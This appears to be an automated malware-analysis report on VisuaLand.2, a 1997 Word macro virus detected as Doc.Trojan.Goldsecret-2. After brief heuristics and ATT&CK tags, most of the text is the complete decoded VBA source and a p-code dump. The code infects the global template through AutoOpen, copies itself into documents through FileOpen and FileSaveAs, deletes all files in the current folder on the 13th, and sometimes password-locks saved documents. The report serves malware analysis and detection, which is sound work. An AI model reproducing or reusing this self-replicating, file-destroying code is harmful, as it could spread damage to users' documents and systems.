MALICIOUS
130
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains legacy WordBasic macro markers and a critical ClamAV detection for 'Doc.Trojan.Goldsecret-2', indicating a malicious macro-based document. The embedded VBA macro, named 'FileSaveAs', explicitly mentions 'VisuaLand.2.WinWord' and 'GoldSecret (C) 1997 VisuaLand Technolgy', and attempts to copy itself and other macros ('AutoOpen', 'FileOpen') to the current document, facilitating its spread. The macro also includes URLs that may be used for downloading additional payloads.
Heuristics 5
-
ClamAV: Doc.Trojan.Goldsecret-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Goldsecret-2
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
WordBasic.MacroCopy "AutoOpen", WordBasic.[WindowName$]() + ":AutoOpen", 1 -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.visualand.com/ In document text (OLE body)
- http://www.visualand.com/�In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 29066 bytes |
SHA-256: f3676acdab9e9aaabccbfa89a6b24171d75455dd4f4bf996222580906090c39e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "FileSaveAs"
'----------------------------------------------------------------
' Virus: VisuaLand.2.WinWord
' Author: Milky Wahyudi Widjaya
' VRating: Make First WordMacro.virii (Atom)
' Compiler: WordMacro in ToolsMacro
' (C) 1983-1994 Microsoft Corporation
' Copyright: GoldSecret (C) 1997 VisuaLand Technolgy
' Email: milky@dnet.net.id 'or' milky@visualand.com
' Homepage: http://www.visualand.com/
' Last Update: 02-02-1997
' VL Office: Visualand Technology
' Jl. H. Marzuki No.37, RT 06/03
' Jakarta, 11530
' Indonesia
' Phone: +62 21 5320382
' Dedication: - Unknown (Atom was created by you???)
' - Eko Sulistiono (MD)
' - All VirMarker in the World
' Thank's: God
'-----------------------------------------------------------------
Public Sub MAIN()
Attribute MAIN.VB_Description = "FileSaveAs\r\nBy Milky Wahyudi Widjaya"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileSaveAs.MAIN"
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlg
WordBasic.Dialog.FileSaveAs dlg
If (dlg.Format = 0) Or (dlg.Format = 1) Then
WordBasic.MacroCopy "FileSaveAs", WordBasic.[WindowName$]() + ":FileSaveAs", 1
WordBasic.MacroCopy "AutoOpen", WordBasic.[WindowName$]() + ":AutoOpen", 1
WordBasic.MacroCopy "FileOpen", WordBasic.[WindowName$]() + ":FileOpen", 1
WordBasic.MacroCopy "VisuaLand", WordBasic.[WindowName$]() + ":VisuaLand", 1
WordBasic.MacroCopy "MyMessage", WordBasic.[WindowName$]() + ":MyMessage", 1
dlg.Format = 1
End If
If (WordBasic.Second(WordBasic.Now()) = 13) Then
dlg.Password = "VisuaLand"
End If
WordBasic.FileSaveAs dlg
End Sub
Attribute VB_Name = "VisuaLand"
'----------------------------------------------------------------
' Virus: VisuaLand.2.WinWord
' Author: Milky Wahyudi Widjaya
' VRating: Make First WordMacro.virii (Atom)
' Compiler: WordMacro in ToolsMacro
' (C) 1983-1994 Microsoft Corporation
' Copyright: GoldSecret (C) 1997 VisuaLand Technolgy
' Email: milky@dnet.net.id 'or' milky@visualand.com
' Homepage: http://www.visualand.com/
' Last Update: 02-02-1997
' VL Office: Visualand Technology
' Jl. H. Marzuki No.37, RT 06/03
' Jakarta, 11530
' Indonesia
' Phone: +62 21 5320382
' Dedication: - Unknown (Atom was created by you???)
' - Eko Sulistiono (MD)
' - All VirMarker in the World
' Thank's: God
'-----------------------------------------------------------------
Public Sub MAIN()
Attribute MAIN.VB_Description = "VisuaLand\r\nBy Milky Wahyudi Widjaya"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.VisuaLand.MAIN"
On Error GoTo -1: On Error GoTo KillError
If WordBasic.Day(WordBasic.Now()) = 13 Then
WordBasic.Kill "*.*"
WordBasic.MsgBox "VisuaLand Technology is the BEST! ", "VisuaLand!", 16
WordBasic.Call "MyMessage"
End If
WordBasic.Call "MyMessage"
KillError:
End Sub
Attribute VB_Name = "MyMessage"
'----------------------------------------------------------------
' Virus: VisuaLand.2.WinWord
' Author: Milky Wahyudi Widjaya
' VRating: Make First WordMacro.virii (Atom)
' Compiler: WordMacro in ToolsMacro
' (C) 1983-1994 Microsoft Corporation
' Copyright: GoldSecret (C) 1997 VisuaLand Technolgy
' Email: milky@dnet.net.id 'or' milky@visualand.com
' Homepage: http://www.visualand.com/
' Last Update: 02-02-1997
' VL Office: Visualand Technology
' Jl. H. Marzuki No.37, RT 06/03
' Jakarta, 11530
' Indonesia
' Phone: +62 21 5320382
' Dedication: - Unknown (Atom was created by you???)
' - Eko Sulistiono (MD)
' - All VirMarker in the World
' Thank's: God
'-----------------------------------------------------------------
Public Sub MAIN()
Attribute MAIN.VB_Description = "MyMessage\r\nBy Milky Wahyudi Widjaya"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.MyMessage.MAIN"
Open "message.txt" For Output As 1
Print #1, "VisuaLand 2.0"
Print #1, "Oleh: Milky Wahyudi Widjaya"
Print #1, "GoldSecret (C) 1997 VisuaLand Technology"
Print #1, ""
Print #1, "Virus kedua setelah visuaLand 1.0 (rekayasa Concept)"
Print #1, "Seperti biasanya saya selalu hadir kedepan anda untuk"
Print #1, "selamat, untuk segala sesuatu yang telah anda lakukan"
Print #1, "memang enak menjadi orang seperti anda, tapi jangan"
Print #1, "dikira anda ini sedang 'happy', anda rupaya sedang"
Print #1, "mengalami masa-masa krisis pada komputer anda, jangan"
Print #1, "menuduh teman anda atau pacar anda yang melakukan hal"
Print #1, "ini, tetapi itu merupakan ulah saya. "
Print #1, ""
Print #1, "Virus ini merupakan hasil rekayasa virus Atom, yang"
Print #1, "dulunya saya akui bahwa virus tersebut merupakan saya"
Print #1, "yang buat, tetapi banyak orang sirik yang ingin merebut"
Print #1, "nya dari saya, tetapi sayalah yang membuat Atom, versi"
Print #1, "ini merupakan versi perbaikan dari virus Atom"
Print #1, ""
Print #1, "Bila anda ada waktu senggang, anda bisa menemukan saya"
Print #1, "di rumah pada jam-jam tertentu, saya harapkan hubungan"
Print #1, "dari anda."
Print #1, ""
Print #1, "Milky Wahyudi Widjaya"
Print #1, "Jl. H Marzuki No. 37 RT 6/3"
Print #1, "Jakarta - 11530"
Print #1, "Indonesia"
Print #1, ""
Print #1, "+62 21 5320382"
Print #1, ""
Print #1, "EMail: milky@dnet.net.id"
Print #1, " milky@visualand.com"
Print #1, "HPage: http://www.visualand.com/"
Print #1, ""
Close 1
End Sub
Attribute VB_Name = "FileOpen"
'----------------------------------------------------------------
' Virus: VisuaLand.2.WinWord
' Author: Milky Wahyudi Widjaya
' VRating: Make First WordMacro.virii (Atom)
' Compiler: WordMacro in ToolsMacro
' (C) 1983-1994 Microsoft Corporation
' Copyright: GoldSecret (C) 1997 VisuaLand Technolgy
' Email: milky@dnet.net.id 'or' milky@visualand.com
' Homepage: http://www.visualand.com/
' Last Update: 02-02-1997
' VL Office: Visualand Technology
' Jl. H. Marzuki No.37, RT 06/03
' Jakarta, 11530
' Indonesia
' Phone: +62 21 5320382
' Dedication: - Unknown (Atom was created by you???)
' - Eko Sulistiono (MD)
' - All VirMarker in the World
' Thank's: God
'-----------------------------------------------------------------
Public Sub MAIN()
Attribute MAIN.VB_Description = "FileOpen\r\nBy Milky Wahyudi Widjaya"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileOpen.MAIN"
On Error GoTo -1: On Error GoTo InfError
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileOpen(False)
WordBasic.CurValues.FileOpen dlg
WordBasic.Dialog.FileOpen dlg
WordBasic.FileOpen dlg
WordBasic.MacroCopy "AutoOpen", dlg.Name + ":AutoOpen", 1
WordBasic.MacroCopy "FileSaveAs", dlg.Name + ":FileSaveAs", 1
WordBasic.MacroCopy "FileOpen", dlg.Name + ":FileOpen", 1
WordBasic.MacroCopy "VisuaLand", dlg.Name + ":VisuaLand", 1
WordBasic.MacroCopy "MyMessage", dlg.Name + ":MyMessage", 1
WordBasic.FileSaveAs Format:=1
InfError:
End Sub
Attribute VB_Name = "AutoOpen"
'----------------------------------------------------------------
' Virus: VisuaLand.2.WinWord
' Author: Milky Wahyudi Widjaya
' VRating: Make First WordMacro.virii (Atom)
' Compiler: WordMacro in ToolsMacro
' (C) 1983-1994 Microsoft Corporation
' Copyright: GoldSecret (C) 1997 VisuaLand Technolgy
' Email: milky@dnet.net.id 'or' milky@visualand.com
' Homepage: http://www.visualand.com/
' Last Update: 02-02-1997
' VL Office: Visualand Technology
' Jl. H. Marzuki No.37, RT 06/03
' Jakarta, 11530
' Indonesia
' Phone: +62 21 5320382
' Dedication: - Unknown (Atom was created by you???)
' - Eko Sulistiono (MD)
' - All VirMarker in the World
' Thank's: God
'-----------------------------------------------------------------
Public Sub MAIN()
Attribute MAIN.VB_Description = "AutoOpen\r\nBy Milky Wahyudi Widjaya"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoOpen.MAIN"
Dim FN$
FN$ = WordBasic.[FileName$]()
On Error GoTo -1: On Error GoTo ErrorInfectGlobalTemplate
If (CheckInfected = 0) Then
WordBasic.MacroCopy FN$ + ":FileSaveAs", "FileSaveAs", 1
WordBasic.MacroCopy FN$ + ":FileOpen", "FileOpen", 1
WordBasic.MacroCopy FN$ + ":AutoOpen", "AutoOpen", 1
WordBasic.MacroCopy FN$ + ":VisuaLand", "VisuaLand", 1
WordBasic.MacroCopy FN$ + ":MyMesaage", "MyMessage", 1
WordBasic.SaveTemplate
End If
WordBasic.Call "VisuaLand"
ErrorInfectGlobalTemplate:
End Sub
Private Function CheckInfected()
Dim I
CheckInfected = 0
If (WordBasic.CountMacros(0) >= 5) Then
For I = 1 To WordBasic.CountMacros(0)
If (WordBasic.[MacroName$](I, 0) = "VisuaLand") Then
CheckInfected = 1
End If
Next I
End If
End Function
' Processing file: /tmp/qstore_sbda3dkc
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/FileSaveAs - 3778 bytes
' Line #0:
' Line #1:
' QuoteRem 0x0000 0x0040 "----------------------------------------------------------------"
' Line #2:
' QuoteRem 0x0000 0x0021 " Virus: VisuaLand.2.WinWord"
' Line #3:
' QuoteRem 0x0000 0x0023 " Author: Milky Wahyudi Widjaya"
' Line #4:
' QuoteRem 0x0000 0x002F " VRating: Make First WordMacro.virii (Atom)"
' Line #5:
' QuoteRem 0x0000 0x0025 " Compiler: WordMacro in ToolsMacro"
' Line #6:
' QuoteRem 0x0000 0x0031 " (C) 1983-1994 Microsoft Corporation"
' Line #7:
' QuoteRem 0x0000 0x0035 " Copyright: GoldSecret (C) 1997 VisuaLand Technolgy"
' Line #8:
' QuoteRem 0x0000 0x0038 " Email: milky@dnet.net.id 'or' milky@visualand.com"
' Line #9:
' QuoteRem 0x0000 0x0027 " Homepage: http://www.visualand.com/"
' Line #10:
' QuoteRem 0x0000 0x0018 " Last Update: 02-02-1997"
' Line #11:
' QuoteRem 0x0000 0x0022 " VL Office: Visualand Technology"
' Line #12:
' QuoteRem 0x0000 0x002C " Jl. H. Marzuki No.37, RT 06/03"
' Line #13:
' QuoteRem 0x0000 0x001C " Jakarta, 11530"
' Line #14:
' QuoteRem 0x0000 0x0017 " Indonesia"
' Line #15:
' QuoteRem 0x0000 0x001C " Phone: +62 21 5320382"
' Line #16:
' QuoteRem 0x0000 0x0034 " Dedication: - Unknown (Atom was created by you???)"
' Line #17:
' QuoteRem 0x0000 0x0023 " - Eko Sulistiono (MD)"
' Line #18:
' QuoteRem 0x0000 0x002A " - All VirMarker in the World"
' Line #19:
' QuoteRem 0x0000 0x0011 " Thank's: God"
' Line #20:
' QuoteRem 0x0000 0x0041 "-----------------------------------------------------------------"
' Line #21:
' Line #22:
' FuncDefn (Public Sub MAIN())
' Line #23:
' Dim
' VarDefn dlg (As Object)
' BoS 0x0000
' SetStmt
' LitVarSpecial (False)
' Ld WordBasic
' MemLd DialogRecord
' ArgsMemLd FileSaveAs 0x0001
' Set dlg
' Line #24:
' Ld dlg
' Ld WordBasic
' MemLd CurValues
' ArgsMemCall FileSaveAs 0x0001
' Line #25:
' Ld dlg
' Ld WordBasic
' MemLd Dialog
' ArgsMemCall FileSaveAs 0x0001
' Line #26:
' Ld dlg
' MemLd Format$
' LitDI2 0x0000
' Eq
' Paren
' Ld dlg
' MemLd Format$
' LitDI2 0x0001
' Eq
' Paren
' Or
' IfBlock
' Line #27:
' LitStr 0x000A "FileSaveAs"
' Ld WordBasic
' ArgsMemLd [WindowName$] 0x0000
' LitStr 0x000B ":FileSaveAs"
' Add
' LitDI2 0x0001
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0003
' Line #28:
' LitStr 0x0008 "AutoOpen"
' Ld WordBasic
' ArgsMemLd [WindowName$] 0x0000
' LitStr 0x0009 ":AutoOpen"
' Add
' LitDI2 0x0001
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0003
' Line #29:
' LitStr 0x0008 "FileOpen"
' Ld WordBasic
' ArgsMemLd [WindowName$] 0x0000
' LitStr 0x0009 ":FileOpen"
' Add
' LitDI2 0x0001
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0003
' Line #30:
' LitStr 0x0009 "VisuaLand"
' Ld WordBasic
' ArgsMemLd [WindowName$] 0x0000
' LitStr 0x000A ":VisuaLand"
' Add
' LitDI2 0x0001
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0003
' Line #31:
' LitStr 0x0009 "MyMessage"
' Ld WordBasic
' ArgsMemLd [WindowName$] 0x0000
' LitStr 0x000A ":MyMessage"
' Add
' LitDI2 0x0001
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0003
' Line #32:
' LitDI2 0x0001
' Ld dlg
' MemSt Format$
' Line #33:
' EndIfBlock
' Line #34:
' Ld WordBasic
' ArgsMemLd Now 0x0000
' Ld WordBasic
' ArgsMemLd Second 0x0001
' LitDI2 0x000D
' Eq
' Paren
' IfBlock
' Line #35:
' LitStr 0x0009 "VisuaLand"
' Ld dlg
' MemSt Password
' Line #36:
' EndIfBlock
' Line #37:
' Ld dlg
' Ld WordBasic
' ArgsMemCall FileSaveAs 0x0001
' Line #38:
' EndSub
' Macros/VBA/VisuaLand - 3240 bytes
' Line #0:
' Line #1:
' QuoteRem 0x0000 0x0040 "----------------------------------------------------------------"
' Line #2:
' QuoteRem 0x0000 0x0021 " Virus: VisuaLand.2.WinWord"
' Line #3:
' QuoteRem 0x0000 0x0023 " Author: Milky Wahyudi Widjaya"
' Line #4:
' QuoteRem 0x0000 0x002F " VRating: Make First WordMacro.virii (Atom)"
' Line #5:
' QuoteRem 0x0000 0x0025 " Compiler: WordMacro in ToolsMacro"
' Line #6:
' QuoteRem 0x0000 0x0031 " (C) 1983-1994 Microsoft Corporation"
' Line #7:
' QuoteRem 0x0000 0x0035 " Copyright: GoldSecret (C) 1997 VisuaLand Technolgy"
' Line #8:
' QuoteRem 0x0000 0x0038 " Email: milky@dnet.net.id 'or' milky@visualand.com"
' Line #9:
' QuoteRem 0x0000 0x0027 " Homepage: http://www.visualand.com/"
' Line #10:
' QuoteRem 0x0000 0x0018 " Last Update: 02-02-1997"
' Line #11:
' QuoteRem 0x0000 0x0022 " VL Office: Visualand Technology"
' Line #12:
' QuoteRem 0x0000 0x002C " Jl. H. Marzuki No.37, RT 06/03"
' Line #13:
' QuoteRem 0x0000 0x001C " Jakarta, 11530"
' Line #14:
' QuoteRem 0x0000 0x0017 " Indonesia"
' Line #15:
' QuoteRem 0x0000 0x001C " Phone: +62 21 5320382"
' Line #16:
' QuoteRem 0x0000 0x0034 " Dedication: - Unknown (Atom was created by you???)"
' Line #17:
' QuoteRem 0x0000 0x0023 " - Eko Sulistiono (MD)"
' Line #18:
' QuoteRem 0x0000 0x002A " - All VirMarker in the World"
' Line #19:
' QuoteRem 0x0000 0x0011 " Thank's: God"
' Line #20:
' QuoteRem 0x0000 0x0041 "-----------------------------------------------------------------"
' Line #21:
' Line #22:
' FuncDefn (Public Sub MAIN())
' Line #23:
' OnError <crash>
' BoS 0x0000
' OnError KillError
' Line #24:
' Ld WordBasic
' ArgsMemLd Now 0x0000
' Ld WordBasic
' ArgsMemLd Day 0x0001
' LitDI2 0x000D
' Eq
' IfBlock
' Line #25:
' LitStr 0x0003 "*.*"
' Ld WordBasic
' ArgsMemCall Kill 0x0001
' Line #26:
' LitStr 0x0022 "VisuaLand Technology is the BEST! "
' LitStr 0x000A "VisuaLand!"
' LitDI2 0x0010
' Ld WordBasic
' ArgsMemCall MsgBox 0x0003
' Line #27:
' LitStr 0x0009 "MyMessage"
' Ld WordBasic
' ArgsMemCall Call 0x0001
' Line #28:
' EndIfBlock
' Line #29:
' LitStr 0x0009 "MyMessage"
' Ld WordBasic
' ArgsMemCall Call 0x0001
' Line #30:
' Label KillError
' Line #31:
' EndSub
' Macros/VBA/MyMessage - 5667 bytes
' Line #0:
' Line #1:
' QuoteRem 0x0000 0x0040 "----------------------------------------------------------------"
' Line #2:
' QuoteRem 0x0000 0x0021 " Virus: VisuaLand.2.WinWord"
' Line #3:
' QuoteRem 0x0000 0x0023 " Author: Milky Wahyudi Widjaya"
' Line #4:
' QuoteRem 0x0000 0x002F " VRating: Make First WordMacro.virii (Atom)"
' Line #5:
' QuoteRem 0x0000 0x0025 " Compiler: WordMacro in ToolsMacro"
' Line #6:
' QuoteRem 0x0000 0x0031 " (C) 1983-1994 Microsoft Corporation"
' Line #7:
' QuoteRem 0x0000 0x0035 " Copyright: GoldSecret (C) 1997 VisuaLand Technolgy"
' Line #8:
' QuoteRem 0x0000 0x0038 " Email: milky@dnet.net.id 'or' milky@visualand.com"
' Line #9:
' QuoteRem 0x0000 0x0027 " Homepage: http://www.visualand.com/"
' Line #10:
' QuoteRem 0x0000 0x0018 " Last Update: 02-02-1997"
' Line #11:
' QuoteRem 0x0000 0x0022 " VL Office: Visualand Technology"
' Line #12:
' QuoteRem 0x0000 0x002C " Jl. H. Marzuki No.37, RT 06/03"
' Line #13:
' QuoteRem 0x0000 0x001C " Jakarta, 11530"
' Line #14:
' QuoteRem 0x0000 0x0017 " Indonesia"
' Line #15:
' QuoteRem 0x0000 0x001C " Phone: +62 21 5320382"
' Line #16:
' QuoteRem 0x0000 0x0034 " Dedication: - Unknown (Atom was created by you???)"
' Line #17:
' QuoteRem 0x0000 0x0023 " - Eko Sulistiono (MD)"
' Line #18:
' QuoteRem 0x0000 0x002A " - All VirMarker in the World"
' Line #19:
' QuoteRem 0x0000 0x0011 " Thank's: God"
' Line #20:
' QuoteRem 0x0000 0x0041 "-----------------------------------------------------------------"
' Line #21:
' Line #22:
' FuncDefn (Public Sub MAIN())
' Line #23:
' LitStr 0x000B "message.txt"
' LitDI2 0x0001
' LitDefault
' Open (For Output)
' Line #24:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000D "VisuaLand 2.0"
' PrintItemNL
' Line #25:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001B "Oleh: Milky Wahyudi Widjaya"
' PrintItemNL
' Line #26:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0028 "GoldSecret (C) 1997 VisuaLand Technology"
' PrintItemNL
' Line #27:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0000 ""
' PrintItemNL
' Line #28:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0039 "Virus kedua setelah visuaLand 1.0 (rekayasa Concept)"
' PrintItemNL
' Line #29:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0039 "Seperti biasanya saya selalu hadir kedepan anda untuk"
' PrintItemNL
' Line #30:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0039 "selamat, untuk segala sesuatu yang telah anda lakukan"
' PrintItemNL
' Line #31:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0039 "memang enak menjadi orang seperti anda, tapi jangan"
' PrintItemNL
' Line #32:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0039 "dikira anda ini sedang 'happy', anda rupaya sedang"
' PrintItemNL
' Line #33:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0039 "mengalami masa-masa krisis pada komputer anda, jangan"
' PrintItemNL
' Line #34:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0039 "menuduh teman anda atau pacar anda yang melakukan hal"
' PrintItemNL
' Line #35:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0025 "ini, tetapi itu merupakan ulah saya. "
' PrintItemNL
' Line #36:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0000 ""
' PrintItemNL
' Line #37:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0039 "Virus ini merupakan hasil rekayasa virus Atom, yang"
' PrintItemNL
' Line #38:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0039 "dulunya saya akui bahwa virus tersebut merupakan saya"
' PrintItemNL
' Line #39:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0039 "yang buat, tetapi banyak orang sirik yang ingin merebut"
' PrintItemNL
' Line #40:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0039 "nya dari saya, tetapi sayalah yang membuat Atom, versi"
' PrintItemNL
' Line #41:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x002D "ini merupakan versi perbaikan dari virus Atom"
' PrintItemNL
' Line #42:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0000 ""
' PrintItemNL
' Line #43:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0039 "Bila anda ada waktu senggang, anda bisa menemukan saya"
' PrintItemNL
' Line #44:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0039 "di rumah pada jam-jam tertentu, saya harapkan hubungan"
' PrintItemNL
' Line #45:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000A "dari anda."
' PrintItemNL
' Line #46:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0000 ""
' PrintItemNL
' Line #47:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0015 "Milky Wahyudi Widjaya"
' PrintItemNL
' Line #48:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001B "Jl. H Marzuki No. 37 RT 6/3"
' PrintItemNL
' Line #49:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000F "Jakarta - 11530"
' PrintItemNL
' Line #50:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0009 "Indonesia"
' PrintItemNL
' Line #51:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0000 ""
' PrintItemNL
' Line #52:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000E "+62 21 5320382"
' PrintItemNL
' Line #53:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0000 ""
' PrintItemNL
' Line #54:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0018 "EMail: milky@dnet.net.id"
' PrintItemNL
' Line #55:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001A " milky@visualand.com"
' PrintItemNL
' Line #56:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0020 "HPage: http://www.visualand.com/"
' PrintItemNL
' Line #57:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0000 ""
' PrintItemNL
' Line #58:
' LitDI2 0x0001
' Close 0x0001
' Line #59:
' EndSub
' Macros/VBA/FileOpen - 3602 bytes
' Line #0:
' Line #1:
' QuoteRem 0x0000 0x0040 "----------------------------------------------------------------"
' Line #2:
' QuoteRem 0x0000 0x0021 " Virus: VisuaLand.2.WinWord"
' Line #3:
' QuoteRem 0x0000 0x0023 " Author: Milky Wahyudi Widjaya"
' Line #4:
' QuoteRem 0x0000 0x002F " VRating: Make First WordMacro.virii (Atom)"
' Line #5:
' QuoteRem 0x0000 0x0025 " Compiler: WordMacro in ToolsMacro"
' Line #6:
' QuoteRem 0x0000 0x0031 " (C) 1983-1994 Microsoft Corporation"
' Line #7:
' QuoteRem 0x0000 0x0035 " Copyright: GoldSecret (C) 1997 VisuaLand Technolgy"
' Line #8:
' QuoteRem 0x0000 0x0038 " Email: milky@dnet.net.id 'or' milky@visualand.com"
' Line #9:
' QuoteRem 0x0000 0x0027 " Homepage: http://www.visualand.com/"
' Line #10:
' QuoteRem 0x0000 0x0018 " Last Update: 02-02-1997"
' Line #11:
' QuoteRem 0x0000 0x0022 " VL Office: Visualand Technology"
' Line #12:
' QuoteRem 0x0000 0x002C " Jl. H. Marzuki No.37, RT 06/03"
' Line #13:
' QuoteRem 0x0000 0x001C " Jakarta, 11530"
' Line #14:
' QuoteRem 0x0000 0x0017 " Indonesia"
' Line #15:
' QuoteRem 0x0000 0x001C " Phone: +62 21 5320382"
' Line #16:
' QuoteRem 0x0000 0x0034 " Dedication: - Unknown (Atom was created by you???)"
' Line #17:
' QuoteRem 0x0000 0x0023 " - Eko Sulistiono (MD)"
' Line #18:
' QuoteRem 0x0000 0x002A " - All VirMarker in the World"
' Line #19:
' QuoteRem 0x0000 0x0011 " Thank's: God"
' Line #20:
' QuoteRem 0x0000 0x0041 "-----------------------------------------------------------------"
' Line #21:
' Line #22:
' FuncDefn (Public Sub MAIN())
' Line #23:
' OnError <crash>
' BoS 0x0000
' OnError InfError
' Line #24:
' Dim
' VarDefn dlg (As Object)
' BoS 0x0000
' SetStmt
' LitVarSpecial (False)
' Ld WordBasic
' MemLd DialogRecord
' ArgsMemLd FileOpen 0x0001
' Set dlg
' Line #25:
' Ld dlg
' Ld WordBasic
' MemLd CurValues
' ArgsMemCall FileOpen 0x0001
' Line #26:
' Ld dlg
' Ld WordBasic
' MemLd Dialog
' ArgsMemCall FileOpen 0x0001
' Line #27:
' Ld dlg
' Ld WordBasic
' ArgsMemCall FileOpen 0x0001
' Line #28:
' LitStr 0x0008 "AutoOpen"
' Ld dlg
' MemLd New
' LitStr 0x0009 ":AutoOpen"
' Add
' LitDI2 0x0001
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0003
' Line #29:
' LitStr 0x000A "FileSaveAs"
' Ld dlg
' MemLd New
' LitStr 0x000B ":FileSaveAs"
' Add
' LitDI2 0x0001
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0003
' Line #30:
' LitStr 0x0008 "FileOpen"
' Ld dlg
' MemLd New
' LitStr 0x0009 ":FileOpen"
' Add
' LitDI2 0x0001
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0003
' Line #31:
' LitStr 0x0009 "VisuaLand"
' Ld dlg
' MemLd New
' LitStr 0x000A ":VisuaLand"
' Add
' LitDI2 0x0001
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0003
' Line #32:
' LitStr 0x0009 "MyMessage"
' Ld dlg
' MemLd New
' LitStr 0x000A ":MyMessage"
' Add
' LitDI2 0x0001
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0003
' Line #33:
' LitDI2 0x0001
' ParamNamed Format$
' Ld WordBasic
' ArgsMemCall FileSaveAs 0x0001
' Line #34:
' Label InfError
' Line #35:
' EndSub
' Macros/VBA/AutoOpen - 4056 bytes
' Line #0:
' Line #1:
' QuoteRem 0x0000 0x0040 "----------------------------------------------------------------"
' Line #2:
' QuoteRem 0x0000 0x0021 " Virus: VisuaLand.2.WinWord"
' Line #3:
' QuoteRem 0x0000 0x0023 " Author: Milky Wahyudi Widjaya"
' Line #4:
' QuoteRem 0x0000 0x002F " VRating: Make First WordMacro.virii (Atom)"
' Line #5:
' QuoteRem 0x0000 0x0025 " Compiler: WordMacro in ToolsMacro"
' Line #6:
' QuoteRem 0x0000 0x0031 " (C) 1983-1994 Microsoft Corporation"
' Line #7:
' QuoteRem 0x0000 0x0035 " Copyright: GoldSecret (C) 1997 VisuaLand Technolgy"
' Line #8:
' QuoteRem 0x0000 0x0038 " Email: milky@dnet.net.id 'or' milky@visualand.com"
' Line #9:
' QuoteRem 0x0000 0x0027 " Homepage: http://www.visualand.com/"
' Line #10:
' QuoteRem 0x0000 0x0018 " Last Update: 02-02-1997"
' Line #11:
' QuoteRem 0x0000 0x0022 " VL Office: Visualand Technology"
' Line #12:
' QuoteRem 0x0000 0x002C " Jl. H. Marzuki No.37, RT 06/03"
' Line #13:
' QuoteRem 0x0000 0x001C " Jakarta, 11530"
' Line #14:
' QuoteRem 0x0000 0x0017 " Indonesia"
' Line #15:
